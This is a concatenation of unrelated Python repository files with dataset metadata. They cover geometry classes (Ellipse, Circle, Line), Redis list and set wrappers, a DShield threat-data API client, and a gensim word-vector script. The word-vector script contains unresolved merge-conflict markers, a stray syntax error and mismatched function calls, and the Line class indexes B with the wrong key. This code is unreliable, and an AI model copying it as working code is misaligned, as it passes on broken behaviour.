# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'panflute=panflute:main',
'panfl=panflute:panfl',
],
},
)
| {
"repo_name": "sergiocorreia/panflute",
"path": "setup.py",
"copies": "1",
"size": "4836",
"license": "bsd-3-clause",
"hash": 3814324838442663000,
"line_mean": 33.0563380282,
"line_max": 94,
"alpha_frac": 0.6306865178,
"autogenerated": false,
"ratio": 4.003311258278146,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0013704777685722177,
"num_lines": 142
} |
'''a pythonic Ellipse.
Super awesome.
'''
import math
from . import Point
from .line import Line, Segment
class Ellipse(object):
'''
Implements an ellipse in the XY plane with the supplied radii.
Returns a unit ellipse centered on the origin in the XY by default.
Usage:
>>> from Geometry import Ellipse
>>> e = Ellipse()
>>> e.isCircle
True
>>> type(e)
<class 'Geometry.ellipse.Ellipse'>
>>> e.radius.x *= 2
>>> e.isCircle,e.isEllipse
(False,True)
'''
def __init__(self, center=None, x_radius=1, y_radius=1, z_radius=0):
'''
:center: - optional Point class initializer
:x_radius: - optional float
:y_radius: - optional float
:z_radius: - optional float
Defaults to a unit ellipse centered on the origin.
'''
# XXX what does it mean to have non-zero radii in
# all three dimensions?
self.center = center
self.radius = x_radius, y_radius, z_radius
@property
def center(self):
'''
Center point of the ellipse, equidistant from foci, Point class.\n
Defaults to the origin.
'''
try:
return self._center
except AttributeError:
pass
self._center = Point()
return self._center
@center.setter
def center(self, newValue):
self.center.xyz = newValue
@property
def radius(self):
'''
Radius of the ellipse, Point class.
'''
try:
return self._radius
except AttributeError:
pass
self._radius = Point(1, 1, 0)
return self._radius
@radius.setter
def radius(self, newValue):
self.radius.xyz = newValue
def __str__(self):
'''
'''
return 'center={p.center!r}, radius={p.radius!r}'.format(p=self)
def __repr__(self):
'''
'''
return '{p.__class__.__name__}({p!s})'.format(p=self)
def __hash__(self):
'''
'''
return hash(self.center) + hash(self.radius)
@property
def majorRadius(self):
'''
The longest radius of the ellipse, float.
'''
return max(self.radius.x, self.radius.y)
@property
def minorRadius(self):
'''
The shortest radius of the ellipse, float.
'''
return min(self.radius.x, self.radius.y)
@property
def xAxisIsMajor(self):
'''
Returns True if the major axis is parallel to the X axis, boolean.
'''
return max(self.radius.x, self.radius.y) == self.radius.x
@property
def xAxisIsMinor(self):
'''
Returns True if the minor axis is parallel to the X axis, boolean.
'''
return min(self.radius.x, self.radius.y) == self.radius.x
@property
def yAxisIsMajor(self):
'''
Returns True if the major axis is parallel to the Y axis, boolean.
'''
return max(self.radius.x, self.radius.y) == self.radius.y
@property
def yAxisIsMinor(self):
'''
Returns True if the minor axis is parallel to the Y axis, boolean.
'''
return min(self.radius.x, self.radius.y) == self.radius.y
@property
def eccentricity(self):
'''
The ratio of the distance between the two foci to the length
of the major axis, float.
0 <= e <= 1
An eccentricity of zero indicates the ellipse is a circle.
As e tends towards 1, the ellipse elongates. It tends to the
shape of a line segment if the foci remain a finite distance
apart and a parabola if one focus is kept fixed as the other
is allowed to move arbitrarily far away.
'''
return math.sqrt(1 - ((self.minorRadius / self.majorRadius) ** 2))
@property
def e(self):
'''
Shorthand notation for eccentricity, float.
'''
return self.eccentricity
@property
def linearEccentricity(self):
'''
Distance between the center of the ellipse and a focus, float.
'''
return math.sqrt((self.majorRadius ** 2) - (self.minorRadius ** 2))
@property
def f(self):
'''
Shorthand notation for linearEccentricity, float.
'''
return self.linearEccentricity
@property
def a(self):
'''
Positive antipodal point on the major axis, Point class.
'''
a = Point(self.center)
if self.xAxisIsMajor:
a.x += self.majorRadius
else:
a.y += self.majorRadius
return a
@property
def a_neg(self):
'''
Negative antipodal point on the major axis, Point class.
'''
na = Point(self.center)
if self.xAxisIsMajor:
na.x -= self.majorRadius
else:
na.y -= self.majorRadius
return na
@property
def b(self):
'''
Positive antipodal point on the minor axis, Point class.
'''
b = Point(self.center)
if self.xAxisIsMinor:
b.x += self.minorRadius
else:
b.y += self.minorRadius
return b
@property
def b_neg(self):
'''
Negative antipodal point on the minor axis, Point class.
'''
nb = Point(self.center)
if self.xAxisIsMinor:
nb.x -= self.minorRadius
else:
nb.y -= self.minorRadius
return nb
@property
def vertices(self):
'''
A dictionary of four points where the axes intersect the ellipse, dict.
'''
return {'a': self.a, 'a_neg': self.a_neg,
'b': self.b, 'b_neg': self.b_neg}
@property
def focus0(self):
'''
First focus of the ellipse, Point class.
'''
f = Point(self.center)
if self.xAxisIsMajor:
f.x -= self.linearEccentricity
else:
f.y -= self.linearEccentricity
return f
@property
def f0(self):
'''
Shorthand notation for focus0, Point class
'''
return self.focus0
@property
def focus1(self):
'''
Second focus of the ellipse, Point class.
'''
f = Point(self.center)
if self.xAxisIsMajor:
f.x += self.linearEccentricity
else:
f.y += self.linearEccentricity
return f
@property
def f1(self):
'''
Shorthand notation for focus1, Point class
'''
return self.focus1
@property
def foci(self):
'''
A list containing the ellipse's foci, list.
'''
return [self.focus0, self.focus1]
@property
def majorAxis(self):
'''
A line coincident with the ellipse's major axis, Segment class.
The major axis is the largest distance across an ellipse.
'''
return Segment(self.a_neg, self.a)
@property
def minorAxis(self):
'''
A line coincident with the ellipse' minor axis, Segment class.
The minor axis is the smallest distance across an ellipse.
'''
return Segment(self.b_neg, self.b)
@property
def isCircle(self):
'''
Is true if the major and minor axes are equal, boolean.
'''
return self.radius.x == self.radius.y
@property
def isEllipse(self):
'''
Is true if the major and minor axes are not equal, boolean.
'''
return self.radius.x != self.radius.y
def __eq__(self, other):
'''
a == b iff:
a.center == b.center
a.radius.x == b.radius.x
a.radius.y == b.radius.y
'''
if self.center != other.center:
return False
if self.radius.x != other.radius.x:
return False
if self.radius.y != other.radius.y:
return False
return True
def __contains__(self, other):
'''
x in y
Is true iff x is a point on or inside the ellipse y.
'''
otherType = type(other)
if issubclass(otherType, Point):
d = sum([other.distance(f) for f in self.foci])
# d < majorAxis.length interior point
# d == majorAxis.length on perimeter of ellipse
# d > majorAxis.length exterior point
return d <= self.majorAxis.length
if issubclass(otherType, Segment):
return (other.A in self) and (other.B in self)
if issubclass(otherType, Ellipse):
return (other.majorAxis in self) and (other.minorAxis in self)
raise TypeError("unknown type '{t}'".format(t=otherType))
# XXX do math operations on ellipses make sense?
class Circle(Ellipse):
'''
Implements a circle in the XY plane with the supplied
center point and radius.
Example usage:
>>> from Geometry import Circle,Point
>>> u = Circle()
>>> u
Circle((0.0,0.0,0.0),1.00)
>>> import math
>>> u.area == math.pi
True
>>> u.circumfrence == 2 * math.pi
True
>>> p = Point.gaussian()
>>> p in u
False
>>> p.xyz = None
>>> p in u
True
>>> p
Point(0.0,0.0,0.0)
'''
@classmethod
def inscribedInRectangle(cls, rectangle):
raise NotImplementedError('inscribedInRectangle')
@classmethod
def inscribedInTriangle(cls, triangle):
raise NotImplementedError('inscribedInTriangle')
pass
@classmethod
def circumscribingRectangle(cls, rectangle):
raise NotImplementedError('circumscribingRectangle')
@classmethod
def circumscribingTriangle(cls, triangle):
raise NotImplementedError('circumscribingTriangle')
@classmethod
def circumcircleForTriangle(cls, triangle):
'''
:param: triangle - Triangle class
:return: Circle class
Returns the circle where every vertex in the input triangle is
on the radius of that circle.
'''
if triangle.isRight:
# circumcircle origin is the midpoint of the hypotenues
o = triangle.hypotenuse.midpoint
r = o.distance(triangle.A)
return cls(o, r)
# otherwise
# 1. find the normals to two sides
# 2. translate them to the midpoints of those two sides
# 3. intersect those lines for center of circumcircle
# 4. radius is distance from center to any vertex in the triangle
abn = triangle.AB.normal
abn += triangle.AB.midpoint
acn = triangle.AC.normal
acn += triangle.AC.midpoint
o = abn.intersection(acn)
r = o.distance(triangle.A)
return cls(o, r)
def __init__(self, center=None, radius=1.0):
'''
:param: center - optional Point class initializer
:param: radius - optional float
Defaults to a unit circle centered on the origin.
'''
self.center = center
self.radius = radius
@property
def radius(self):
'''
The circle's radius, float.
'''
try:
return self._radius
except AttributeError:
pass
self._radius = 1.0
return self._radius
@radius.setter
def radius(self, newValue):
self._radius = float(newValue)
@property
def diameter(self):
'''
The circle's diameter, float.
'''
return self.radius * 2
@property
def circumfrence(self):
'''
The circle's circumfrence, float.
'''
return 2 * math.pi * self.radius
@property
def area(self):
'''
The circle's area, float.
'''
return math.pi * (self.radius ** 2)
@property
def a(self):
return Point(self.radius, self.center.y)
@property
def a_neg(self):
return Point(-self.radius, self.center.y)
@property
def b(self):
return Point(self.center.x, self.radius)
@property
def b_neg(self):
return Point(self.center.x, -self.radius)
def __contains__(self, other):
'''
:param: Point | Segment | Ellipse class
:return: boolean
Returns True if the distance from the center to the point
is less than or equal to the radius.
'''
otherType = type(other)
if issubclass(otherType, Point):
return other.distance(self.center) <= self.radius
if issubclass(otherType, Segment):
return (other.A in self) and (other.B in self)
if issubclass(otherType, Circle):
m = self.center.distance(other.center) / 2
return (m <= self.radius) and (m <= other.radius)
if issubclass(otherType, Ellipse):
return (other.majorAxis in self) and (other.minorAxis in self)
raise TypeError("unknown type '{t}'".format(t=otherType))
def doesIntersect(self, other):
'''
:param: other - Circle class
Returns True iff:
self.center.distance(other.center) <= self.radius+other.radius
'''
otherType = type(other)
if issubclass(otherType, Ellipse):
distance = self.center.distance(other.center)
radiisum = self.radius + other.radius
return distance <= radiisum
if issubclass(otherType, Line):
raise NotImplementedError('doesIntersect,other is Line class')
raise TypeError("unknown type '{t}'".format(t=otherType))
class Sphere(Circle):
@property
def volume(self):
'''
The spherical volume bounded by this circle, float.
'''
return (4. / 3.) * math.pi * (self.radius ** 3)
| {
"repo_name": "JnyJny/Geometry",
"path": "Geometry/ellipse.py",
"copies": "1",
"size": "13860",
"license": "mit",
"hash": 5863393421034708000,
"line_mean": 23.6181172291,
"line_max": 79,
"alpha_frac": 0.5570707071,
"autogenerated": false,
"ratio": 4.078869923484403,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 563
} |
#A pythonic implementation of @bmschmidt 's 'vector reject'. To be used in gensim.
import numpy as np
from gensim import matutils
from numpy import float32 as REAL
from gensim.models import Word2Vec
from numpy import array
from unicodedata import normalize
<<<<<<< HEAD
model = Word2Vec.load(r'C:\Users\spokha01\SkyDrive\Public\Public Datasets\Kantipur')
=======
>>>>>>> origin/master
print("libraries loaded")
model = Word2Vec.load(r'C:\Users\n0272436\Desktop\datasets\Kantipur')
print("model 1 loaded")
model1 = Word2Vec.load(r'C:\Users\n0272436\Desktop\datasets\v1.model')
print ("model 2 loaded")
def reject(A,B):
#RAW REJECT, REJECT VECTOR B FROM VEC -A
'''Create a 'projection', and subract it from the original vector'''
# project = dot(A, norm(B))*norm(B)
project = np.linalg.linalg.dot(A, B) * B
return A - project
def reject_words(A, B):compa
'''Takes two **LIST OF WORDS** and
returns most_similar for word A, while rejecting words with meanings closer to B.
Seems to work better than just giving in negative words.
'''
in_words = A+B
basic_word = [model[each] for each in A]
reject_word = [model[each] for each in B]
basic_mean = matutils.unitvec(array(basic_word).mean(axis=0)).astype(REAL)
reject_mean = matutils.unitvec(array(reject_word).mean(axis=0)).astype(REAL)
r = reject(basic_mean, reject_mean)
dists = np.linalg.linalg.dot(model.syn0, r)
best = matutils.argsort(dists, topn = 500, reverse = True)
result = [(model.index2word[sim], float(dists[sim])) for sim in best if A[0] not in model.index2word[sim]]
return result
def createTranspose(word):
trans = ['ु', 'ू', 'ि', 'ी']
words = []
for i, each in enumerate(trans):
if i% 2 ==0:
words.append(word.replace(each, trans[i+1]))
else:
words.append(word.replace(each, trans[i-1]))
return list(set(words))
#def compareModels(A, B):
def reject_words_1(A, B, model = model):
'''Takes two **LIST OF WORDS** and
returns most_similar for word A, while rejecting words with meanings closer to B.
Seems to work better than just giving in negative words.
'''
in_words = A+B
basic_word = [model[each] for each in A]
reject_word = [model[each] for each in B]
basic_mean = matutils.unitvec(array(basic_word).mean(axis=0)).astype(REAL)
reject_mean = matutils.unitvec(array(reject_word).mean(axis=0)).astype(REAL)
r = reject(basic_mean, reject_mean)
dists = np.linalg.linalg.dot(model.syn0norm, r)
best = matutils.argsort(dists, topn = 500, reverse = True)
result = [(model.index2word[sim], float(dists[sim])) for sim in best if A[0] not in model.index2word[sim]]
return result
from tabulate import tabulate
def clearRoot(lst, word):
return [each for each in lst if word not in each]
def compareWords(wordlist1, wordlist2, multimodal = False):
regular_sim = model.most_similar(wordlist1, negative = wordlist2, topn=200)
#rejectWords = reject_words_1(wordlist1, wordlist2, model)[:20]
rejectWords1 = reject_words_1(wordlist1, wordlist2, model)
r = wordlist1[0]
if not multimodal:
printJustified(['regular_sim']+list(list(zip(*regular_sim))[0]),\
['reject_syn0norm']+list(list(zip(*rejectWords1))[0]))
else:
regular_sim_1 = model1.most_similar(wordlist1, negative = wordlist2, topn=200)
rejectWords1_1 = reject_words_1(wordlist1, wordlist2, model1)
print(\
tabulate({"mod0_regular_sim": clearRoot(list(list(zip(*regular_sim))[0]), r)[:20],\
"mod0_reject_syn0norm": clearRoot(list(list(zip(*rejectWords1))[0]), r)[:20],\
'mod1_regular_sim': clearRoot(list(list(zip(*regular_sim_1))[0]), r)[:20], \
'mod1_reject_syn0norm' : clearRoot(list(list(zip(*rejectWords1_1))[0]), r)[:20]
},\
headers = 'keys')
)
#printJustified(['_mod0_regular_sim']+list(list(zip(*regular_sim))[0]),\
# ['reject_syn0norm']+list(list(zip(*rejectWords1))[0]),\
# ['_mod1_regular_sim']+list(list(zip(*regular_sim_1))[0]),\
# ['_mod1_reject_syn0norm']+list(list(zip(*rejectWords1_1))[0]),\
# ) हावा
<<<<<<< HEAD
printJustified(['regular_sim']+list(list(zip(*regular_sim))[0]), ['reject_syn0']\
+list(list(zip(*rejectWords))[0]),
['reject_syn0norm']+list(list(zip(*rejectWords1))[0]))
def printJustified(res1, res2, res3):
zp = zip(res1, res2, res3)
=======
def printJustified(res1, res2, res3, res4):
zp = zip(res1, res2, res3, res4)
>>>>>>> origin/master
for each in zp:
l1 = len(each[0])-len(normalize('NFD', each[0]))
l2 = len(normalize('NFD', each[1]))
l3 = len(normalize('NFD', each[2]))
print ('| '+each[0].ljust(15)+'|'+ each[1].ljust(15)+'| '+each[2].ljust(15)+' |'+each[3].ljust(15))
| {
"repo_name": "shirish93/CoLing",
"path": "vector_reject.py",
"copies": "1",
"size": "4858",
"license": "mit",
"hash": 9167192636570802000,
"line_mean": 39.35,
"line_max": 108,
"alpha_frac": 0.6437422553,
"autogenerated": false,
"ratio": 3.0338345864661656,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8954672789576941,
"avg_score": 0.0445808104378448,
"num_lines": 120
} |
"A pythonic interface to a Redis dictionary."
import redis_ds.redis_config as redis_config
from redis_ds.serialization import PassThroughSerializer, PickleSerializer, JSONSerializer
class RedisList(PassThroughSerializer):
"Interface to a Redis list."
def __init__(self, list_key, redis_client=redis_config.CLIENT):
"Initialize interface."
self._client = redis_client
self.list_key = list_key
def __len__(self):
"Number of values in list."
return self._client.llen(self.list_key)
def __getitem__(self, key):
"Retrieve a value by index or values by slice syntax."
if type(key) == int:
return self.deserialize(self._client.lindex(self.list_key, key))
elif hasattr(key, 'start') and hasattr(key, 'stop'):
start = key.start or 0
stop = key.stop or -1
values = self._client.lrange(self.list_key, start, stop)
return [self.deserialize(value) for value in values]
else:
raise IndexError
def __setitem__(self, pos, val):
"Set the value at a position."
val = self.serialize(val)
return self._client.lset(self.list_key, pos, val)
def append(self, val, head=False):
"Append a value to list to rear or front."
val = self.serialize(val)
if head:
return self._client.lpush(self.list_key, val)
else:
return self._client.rpush(self.list_key, val)
def pop(self, head=False, blocking=False):
"Remove an value from head or tail of list."
if head and blocking:
return self.deserialize(self._client.blpop(self.list_key)[1])
elif head:
return self.deserialize(self._client.lpop(self.list_key))
elif blocking:
return self.deserialize(self._client.brpop(self.list_key)[1])
else:
return self.deserialize(self._client.rpop(self.list_key))
def __unicode__(self):
"Represent entire list."
return u"RedisList(%s)" % (self[0:-1],)
def __repr__(self):
"Represent entire list."
return self.__unicode__()
class PickleRedisList(RedisList, PickleSerializer):
"Serialize Redis List values via Pickle."
pass
class JSONRedisList(RedisList, JSONSerializer):
"Serialize Redis List values via JSON."
pass
| {
"repo_name": "lethain/Redis-Python-Datastructures",
"path": "redis_ds/redis_list.py",
"copies": "1",
"size": "2372",
"license": "mit",
"hash": -7914642033916656000,
"line_mean": 33.3768115942,
"line_max": 90,
"alpha_frac": 0.6214165261,
"autogenerated": false,
"ratio": 3.933665008291874,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00015926102882624622,
"num_lines": 69
} |
"A Pythonic interface to a Redis set."
import redis_ds.redis_config as redis_config
from redis_ds.serialization import PassThroughSerializer, PickleSerializer, JSONSerializer
class RedisSet(PassThroughSerializer):
"An object which behaves like a Python set, but which is based by Redis."
def __init__(self, set_key, redis_client=redis_config.CLIENT):
"Initialize the set."
self._client = redis_client
self.set_key = set_key
def __len__(self):
"Number of values in the set."
return self._client.scard(self.set_key)
def add(self, val):
"Add a value to the set."
val = self.serialize(val)
self._client.sadd(self.set_key, val)
def update(self, vals):
"Idempotently add multiple values to the set."
vals = [self.serialize(x) for x in vals]
self._client.sadd(self.set_key, *vals)
def __contains__(self, val):
"Check if a value is a member of a set."
return self._client.sismember(self.set_key, val)
def pop(self):
"Remove and return a value from the set."
return self.deserialize(self._client.spop(self.set_key))
def remove(self, val):
"Remove a specific value from the set."
self._client.srem(self.set_key, self.serialize(val))
def __unicode__(self):
"Represent all members in a set."
objs = self._client.smembers(self.set_key)
objs = [self.deserialize(x) for x in objs]
return u"RedisSet(%s)" % (objs,)
def __repr__(self):
"Represent all members in a set."
return self.__unicode__()
class PickleRedisSet(RedisSet, PickleSerializer):
"Pickle values stored in set."
pass
class JSONRedisSet(RedisSet, JSONSerializer):
"JSON values stored in set."
pass
| {
"repo_name": "lethain/Redis-Python-Datastructures",
"path": "redis_ds/redis_set.py",
"copies": "1",
"size": "1836",
"license": "mit",
"hash": -5831451216841437000,
"line_mean": 30.6551724138,
"line_max": 90,
"alpha_frac": 0.6252723312,
"autogenerated": false,
"ratio": 3.817047817047817,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.49423201482478174,
"avg_score": null,
"num_lines": null
} |
"""A Pythonic interface to the Internet Storm Center / DShield API."""
import datetime
import requests
__version__ = "0.2.1"
XML = "?xml"
JSON = "?json"
TEXT = "?text"
PHP = "?php"
__BASE_URL = "https://dshield.org/api/"
class Error(Exception):
"""Custom exception class."""
def _get(function, return_format=None):
"""Get and return data from the API.
:returns: A str, list, or dict, depending on the input values and API data.
"""
if return_format:
return requests.get(''.join([__BASE_URL, function, return_format])).text
return requests.get(''.join([__BASE_URL, function, JSON])).json()
def backscatter(date=None, rows=None, return_format=None):
"""Returns possible backscatter data.
This report only includes "syn ack" data and is summarized by source port.
:param date: optional string (in Y-M-D format) or datetime.date() object
:param rows: optional number of rows returned (default 1000)
:returns: list -- backscatter data.
"""
uri = 'backscatter'
if date:
try:
uri = '/'.join([uri, date.strftime("%Y-%m-%d")])
except AttributeError:
uri = '/'.join([uri, date])
if rows:
uri = '/'.join([uri, str(rows)])
return _get(uri, return_format)
def handler(return_format=None):
"""Returns the name of the handler of the day."""
return _get('handler', return_format)
def infocon(return_format=None):
"""Returns the current infocon level (green, yellow, orange, red)."""
return _get('infocon', return_format)
def ip(ip_address, return_format=None):
"""Returns a summary of the information our database holds for a
particular IP address (similar to /ipinfo.html).
In the returned data:
Count: (also reports or records) total number of packets blocked from
this IP.
Attacks: (also targets) number of unique destination IP addresses for
these packets.
:param ip_address: a valid IP address
"""
response = _get('ip/{address}'.format(address=ip_address), return_format)
if 'bad IP address' in str(response):
raise Error('Bad IP address, {address}'.format(address=ip_address))
else:
return response
def port(port_number, return_format=None):
"""Summary information about a particular port.
In the returned data:
Records: Total number of records for a given date.
Targets: Number of unique destination IP addresses.
Sources: Number of unique originating IPs.
:param port_number: a string or integer port number
"""
response = _get('port/{number}'.format(number=port_number), return_format)
if 'bad port number' in str(response):
raise Error('Bad port number, {number}'.format(number=port_number))
else:
return response
def portdate(port_number, date=None, return_format=None):
"""Information about a particular port at a particular date.
If the date is ommited, today's date is used.
:param port_number: a string or integer port number
:param date: an optional string in 'Y-M-D' format or datetime.date() object
"""
uri = 'portdate/{number}'.format(number=port_number)
if date:
try:
uri = '/'.join([uri, date.strftime("%Y-%m-%d")])
except AttributeError:
uri = '/'.join([uri, date])
response = _get(uri, return_format)
if 'bad port number' in str(response):
raise Error('Bad port number, {number}'.format(number=port_number))
else:
return response
def topports(sort_by='records', limit=10, date=None, return_format=None):
"""Information about top ports for a particular date with return limit.
:param sort_by: one of 'records', 'targets', 'sources'
:param limit: number of records to be returned
:param date: an optional string in 'Y-M-D' format or datetime.date() object
"""
uri = '/'.join(['topports', sort_by, str(limit)])
if date:
try:
uri = '/'.join([uri, date.strftime("%Y-%m-%d")])
except AttributeError:
uri = '/'.join([uri, date])
return _get(uri, return_format)
def topips(sort_by='records', limit=10, date=None, return_format=None):
"""Information about top ports for a particular date with return limit.
:param sort_by: one of 'records', 'attacks'
:param limit: number of records to be returned
:param date: an optional string in 'Y-M-D' format or datetime.date() object
"""
uri = '/'.join(['topips', sort_by, str(limit)])
if date:
try:
uri = '/'.join([uri, date.strftime("%Y-%m-%d")])
except AttributeError:
uri = '/'.join([uri, date])
return _get(uri, return_format)
def sources(sort_by='attacks', limit=10, date=None, return_format=None):
"""Information summary from the last 30 days about source IPs with return
limit.
:param sort_by: one of 'ip', 'count', 'attacks', 'firstseen', 'lastseen'
:param limit: number of records to be returned (max 10000)
:param date: an optional string in 'Y-M-D' format or datetime.date() object
"""
uri = '/'.join(['sources', sort_by, str(limit)])
if date:
try:
uri = '/'.join([uri, date.strftime("%Y-%m-%d")])
except AttributeError:
uri = '/'.join([uri, date])
return _get(uri, return_format)
def porthistory(port_number, start_date=None, end_date=None, return_format=None):
"""Returns port data for a range of dates.
In the return data:
Records: Total number of records for a given date range.
Targets: Number of unique destination IP addresses.
Sources: Number of unique originating IPs.
:param port_number: a valid port number (required)
:param start_date: string or datetime.date(), default is 30 days ago
:param end_date: string or datetime.date(), default is today
"""
uri = 'porthistory/{port}'.format(port=port_number)
if not start_date:
# default 30 days ago
start_date = datetime.datetime.now() - datetime.timedelta(days=30)
try:
uri = '/'.join([uri, start_date.strftime("%Y-%m-%d")])
except AttributeError:
uri = '/'.join([uri, start_date])
if end_date:
try:
uri = '/'.join([uri, end_date.strftime("%Y-%m-%d")])
except AttributeError:
uri = '/'.join([uri, end_date])
response = _get(uri, return_format)
if 'bad port number' in str(response):
raise Error('Bad port, {port}'.format(port=port_number))
else:
return response
def asnum(number, limit=None, return_format=None):
"""Returns a summary of the information our database holds for a
particular ASNUM (similar to /asdetailsascii.html) with return limit.
:param limit: number of records to be returned (max 2000)
"""
uri = 'asnum/{number}'.format(number=number)
if limit:
uri = '/'.join([uri, str(limit)])
return _get(uri, return_format)
def dailysummary(start_date=None, end_date=None, return_format=None):
"""Returns daily summary totals of targets, attacks and sources. Limit to
30 days at a time. (Query 2002-01-01 to present)
In the return data:
Sources: Distinct source IP addresses the packets originate from.
Targets: Distinct target IP addresses the packets were sent to.
Reports: Number of packets reported.
:param start_date: string or datetime.date(), default is today
:param end_date: string or datetime.date(), default is today
"""
uri = 'dailysummary'
if not start_date:
# default today
start_date = datetime.datetime.now()
try:
uri = '/'.join([uri, start_date.strftime("%Y-%m-%d")])
except AttributeError:
uri = '/'.join([uri, start_date])
if end_date:
try:
uri = '/'.join([uri, end_date.strftime("%Y-%m-%d")])
except AttributeError:
uri = '/'.join([uri, end_date])
return _get(uri, return_format)
def daily404summary(date, return_format=None):
"""Returns daily summary information of submitted 404 Error Page
Information.
:param date: string or datetime.date() (required)
"""
uri = 'daily404summary'
if date:
try:
uri = '/'.join([uri, date.strftime("%Y-%m-%d")])
except AttributeError:
uri = '/'.join([uri, date])
return _get(uri, return_format)
def daily404detail(date, limit=None, return_format=None):
"""Returns detail information of submitted 404 Error Page Information.
:param date: string or datetime.date() (required)
:param limit: string or int, limit for number of returned items
"""
uri = 'daily404detail'
if date:
try:
uri = '/'.join([uri, date.strftime("%Y-%m-%d")])
except AttributeError:
uri = '/'.join([uri, date])
if limit:
uri = '/'.join([uri, str(limit)])
return _get(uri, return_format)
def glossary(term=None, return_format=None):
"""List of glossary terms and definitions.
:param term: a whole or parital word to "search" in the API
"""
uri = 'glossary'
if term:
uri = '/'.join([uri, term])
return _get(uri, return_format)
def webhoneypotsummary(date, return_format=None):
"""API data for `Webhoneypot: Web Server Log Project
<https://dshield.org/webhoneypot/>`_.
:param date: string or datetime.date() (required)
"""
uri = 'webhoneypotsummary'
try:
uri = '/'.join([uri, date.strftime("%Y-%m-%d")])
except AttributeError:
uri = '/'.join([uri, date])
return _get(uri, return_format)
def webhoneypotbytype(date, return_format=None):
"""API data for `Webhoneypot: Attack By Type
<https://isc.sans.edu/webhoneypot/types.html>`_. We currently use a set
of regular expressions to determine the type of attack used to attack the
honeypot. Output is the top 30 attacks for the last month.
:param date: string or datetime.date() (required)
"""
uri = 'webhoneypotbytype'
try:
uri = '/'.join([uri, date.strftime("%Y-%m-%d")])
except AttributeError:
uri = '/'.join([uri, date])
return _get(uri, return_format)
| {
"repo_name": "rshipp/python-dshield",
"path": "dshield.py",
"copies": "1",
"size": "10189",
"license": "bsd-3-clause",
"hash": -8443831260920060000,
"line_mean": 32.9633333333,
"line_max": 81,
"alpha_frac": 0.6295024046,
"autogenerated": false,
"ratio": 3.763945326930181,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9887798029408688,
"avg_score": 0.0011299404242986347,
"num_lines": 300
} |
'''a pythonic Line
'''
import math
import collections
from . import Point
from .exceptions import InfiniteLength, CollinearPoints, ParallelLines
from .constants import *
class Line(collections.Mapping):
'''
A line with infinite length defined by two points; A and B.
Usage:
>>> a = Line()
...
>>> b = Line((0,0),(1,1))
>>> c = Line(Point(),{'y':1,'x':1})
>>> b == c
True
>>>
'''
@classmethod
def fromSegment(cls, segment):
'''
:param: segment - Segment subclass
:return: Line subclass
Returns a coincident Line object.
'''
return cls(segment.A, segment.B)
@classmethod
def fromRay(cls, ray):
'''
:param: ray - Ray subclass
:return: Line subclass
Returns a coincident Line object.
'''
return cls(ray.A, ray.B)
@classmethod
def fromLine(cls, line):
'''
:param: line - Line subclass
:return: Line subclass
Returns a new coincident Line object.
'''
return cls(line.A, line.B)
@classmethod
def units(cls):
'''
Returns a list of three 'unit' lines whose first point is the origin
and second points are (1,0,0), (0,1,0 and (0,0,1).
'''
return [cls(B=p) for p in Point.units()]
def __init__(self, *args, **kwds):
'''
line(<iterable>,A=..,B=...)
'''
self(*args, **kwds)
def __call__(self, *args, **kwds):
'''
'''
if len(args) == 1:
self.A, self.B = args[0]
if len(args) > 1:
self.A, self.B = args
for p in ['A', 'B']:
try:
setattr(self, p, kwds[p])
except KeyError:
pass
@property
def A(self):
try:
return self._A
except AttributeError:
pass
self._A = Point()
return self._A
@A.setter
def A(self, newValue):
self.A.xyz = newValue
@property
def B(self):
try:
return self._B
except AttributeError:
pass
self._B = Point()
return self._B
@B.setter
def B(self, newValue):
self.B.xyz = newValue
def __iter__(self):
return iter(self.AB)
@property
def AB(self):
'''
A list containing Points A and B.
'''
try:
return self._AB
except AttributeError:
pass
self._AB = [self.A, self.B]
return self._AB
@AB.setter
def AB(self, newValues):
try:
self.A, self.B = newValues
except ValueError:
self.A = newValues
@property
def isVertical(self):
'''
XXX missing doc string
'''
return (self.A.x == self.B.x)
@property
def isHorizontal(self):
'''
XXX missing doc string
'''
return (self.A.y == self.B.y)
@property
def isCoplanar(self):
# XXX what is the property of A.z == B.z called?
# XXX need four points to determine coplanarity
'''
XXX missing doc string
'''
return (self.A.z == self.B.z)
@property
def m(self):
'''
Slope parameter, Point(B - A).
'''
return self.B - self.A
@property
def length(self):
'''
Lines have an infinite length, raises InfiniteLength() exception.
'''
raise InfiniteLength()
@property
def normal(self):
'''
:return: Line
Returns a Line normal (perpendicular) to this Line.
'''
d = self.B - self.A
return Line([-d.y, d.x], [d.y, -d.x])
def pointAt(self, t):
'''
:t: float parameter
:return: Point subclass
Varying 't' will produce a new Point along this Line.
t = 0 -> point A
t = 1 -> point B
'''
# p<xyz> = A<xyz> + t *( B<xyz> - A<xyz> )
return self.A + (t * self.m)
def t(self, point):
'''
:point: Point subclass
:return: float
If :point: is collinear, determine the 't' coefficient of
the parametric equation:
xyz = A<xyz> + t ( B<xyz> - A<xyz> )
if t < 0, point is less than A and B on the line
if t >= 0 and <= 1, point is between A and B
if t > 1 point is greater than B
'''
# XXX could use for an ordering on points?
if point not in self:
msg = "'{p}' is not collinear with '{l}'"
raise CollinearPoints(msg.format(p=point, l=self))
# p = A + t ( B - A)
# p - A = t ( B - A)
# p - A / (B -A) = t
return (point - self.A) / self.m
def __str__(self):
'''
'''
return 'A=({l.A}), B=({l.B})'.format(l=self)
def __repr__(self):
'''
Returns a representation string of this instance.
'''
return '{l.__class__.__name__}({l!s})'.format(l=self)
def __len__(self):
'''
Treat a line as a two item container with length '2'.
'''
return 2
def __getitem__(self, key):
'''
index zero is equivalent to property A
index one is equivalent to property B
'''
if key == 'A' or key == 0:
return self.A
if key == 'B' or key == 0:
return self.B
raise TypeError(key)
def __setitem__(self, key, value):
'''
index zero is equivalent to property A
index one is equivalent to property B
'''
if key == 'A' or key == 0:
self.A = value
if key == 'B' or key == 0:
self.B = value
raise TypeError(key)
def __contains__(self, other):
'''
p in l
